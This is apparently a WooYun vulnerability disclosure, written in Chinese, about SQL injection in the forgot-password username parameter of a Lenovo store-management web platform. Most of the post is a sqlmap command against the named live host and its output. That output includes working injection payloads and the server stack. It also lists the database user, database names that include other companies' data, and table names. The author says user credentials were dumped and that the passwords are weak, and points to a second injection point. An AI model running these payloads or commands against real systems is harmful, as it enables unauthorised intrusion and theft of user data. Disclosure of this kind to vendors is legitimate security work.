WooYun.org

站点：
lenovo.marketviewrc.com 联想MIDH店面规范管理平台
点击忘记密码处，username参数没有过滤，导致注射漏洞
sqlmap.py -u "http://lenovo.marketviewrc.com/sendcode.asp?username=e" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: username
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: username=e' AND 9229=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(109)+CHAR
(113)+CHAR(58)+(SELECT (CASE WHEN (9229=9229) THEN CHAR(49) ELSE CHAR(48) END))+
CHAR(58)+CHAR(112)+CHAR(106)+CHAR(102)+CHAR(58))) AND 'DAYt'='DAYt
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: username=e' UNION ALL SELECT CHAR(58)+CHAR(108)+CHAR(109)+CHAR(113)
+CHAR(58)+CHAR(107)+CHAR(120)+CHAR(86)+CHAR(120)+CHAR(122)+CHAR(86)+CHAR(65)+CHA
R(67)+CHAR(121)+CHAR(115)+CHAR(58)+CHAR(112)+CHAR(106)+CHAR(102)+CHAR(58), NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=e'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=e' WAITFOR DELAY '0:0:5'--
---
[15:02:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[15:02:35] [INFO] fetching current user
current user: 'jst'
[15:02:35] [INFO] fetching current database
current database: 'lenovoMobile'
[15:02:35] [INFO] fetching database names
[15:02:35] [INFO] the SQL query used returns 16 entries
[15:02:35] [INFO] resumed: "cfkjprice"
[15:02:35] [INFO] resumed: "chamate"
[15:02:35] [INFO] resumed: "db_cdBlog"
[15:02:35] [INFO] resumed: "lenovoMobile"
[15:02:35] [INFO] resumed: "lenovoTel"
[15:02:35] [INFO] resumed: "marketview"
[15:02:35] [INFO] resumed: "marketview_demo"
[15:02:35] [INFO] resumed: "marketview2011"
[15:02:35] [INFO] resumed: "marketview2012"
[15:02:35] [INFO] resumed: "master"
[15:02:35] [INFO] resumed: "mkv"
[15:02:35] [INFO] resumed: "model"
[15:02:35] [INFO] resumed: "msdb"
[15:02:35] [INFO] resumed: "sanofi"
[15:02:35] [INFO] resumed: "sanofi2"
[15:02:35] [INFO] resumed: "tempdb"
available databases [16]:
[*] cfkjprice
[*] chamate
[*] db_cdBlog
[*] lenovoMobile
[*] lenovoTel
[*] marketview
[*] marketview2011
[*] marketview2012
[*] marketview_demo
[*] master
[*] mkv
[*] model
[*] msdb
[*] sanofi
[*] sanofi2
[*] tempdb
Database: lenovoMobile
[41 tables]
+-------------------------+
| dbo.Comm_Basic |
| dbo.Comm_Dis |
| dbo.Comm_Other |
| dbo.Comm_Pop |
| dbo.Comm_Sale |
| dbo.Comm_Sample |
| dbo.Comm_Score |
| dbo.Comm_Sell |
| dbo.Comm_freeback |
| dbo.LM_BaoBei |
| dbo.LM_Case |
| dbo.LM_Help |
| dbo.LM_Shop |
| dbo.LM_Survey |
| dbo.LM_Survey2 |
| dbo.LM_Survey3 |
| dbo.Price_Collect |
| dbo.Price_Fixing |
| dbo.Price_Shop |
| dbo.Price_Site |
| dbo.Shop_Build |
| dbo.Shop_Comm |
| dbo.Shop_CommDis |
| dbo.Shop_CommPop |
| dbo.Shop_CommVal |
| dbo.Shop_Salesman |
| dbo.Shop_Score |
| dbo.Shopuser |
| dbo.Sys_Case |
| dbo.Sys_City |
| dbo.Sys_Note |
| dbo.Sys_Product |
| dbo.Sys_Province |
| dbo.Sys_User |
| dbo.View_LastDayCollect |
| dbo.View_NoteCollect |
| dbo.b_messages |
| dbo.r_messages |
| dbo.s_messages |
| dbo.user1308 |
| dbo.w_messages |
+-------------------------+
穿山甲跑下用户名密码，造成信息泄露

用户名是工号，密码是弱口令，厂商懂的。
登录后截图一张

在线答疑处也存在sql注入漏洞，未深入，请厂商自查一下。

over